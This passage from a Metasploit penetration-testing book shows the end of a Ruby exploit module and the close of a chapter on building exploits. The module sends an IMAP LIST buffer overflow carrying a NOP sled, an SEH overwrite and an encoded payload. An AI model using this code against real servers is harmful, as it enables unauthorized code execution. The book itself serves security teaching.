Creating Your Own Exploits

213

    def exploit
        connected = connect_login
        lead = "\x90" * (10351 - payload.encoded.length)
        near = "\xe9\xdd\xd7\xff\xff"
        nseh = "\xeb\xf9\x90\x90"
        evil = lead + payload.encoded + near + nseh + [target.ret].pack("A3")
        print_status("Sending payload")
        sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"
        sock.put(sploit)
        handler
        disconnect
    end

end

Wrapping Up

Although we haven’t uncovered a new vulnerability in this chapter, we have 
covered the entire process from developing and running a fuzzer to developing 
a functioning exploit. The exploit that we built in this chapter is complicated 
and unusual, and it therefore offers an excellent opportunity to think beyond 
the basics and explore creative avenues to obtain code execution.

One of the best ways to dig deeper into Metasploit is to read through the 

Metasploit source files and other exploit modules to get a better idea of what 
is possible within the Metasploit Framework. The techniques in this chapter 
have given you the basic tools you’ll need to begin discovering vulnerabilities 
and developing Metasploit exploit modules that will take advantage of them.

In the next chapter we will begin to dive into porting exploits into the 

Framework that will build upon the knowledge you learned in this chapter. 
We’ll show you how to convert publicly available exploits into a working 
Metasploit exploit by rewriting the exploit and debugging it to see what it’s 
doing.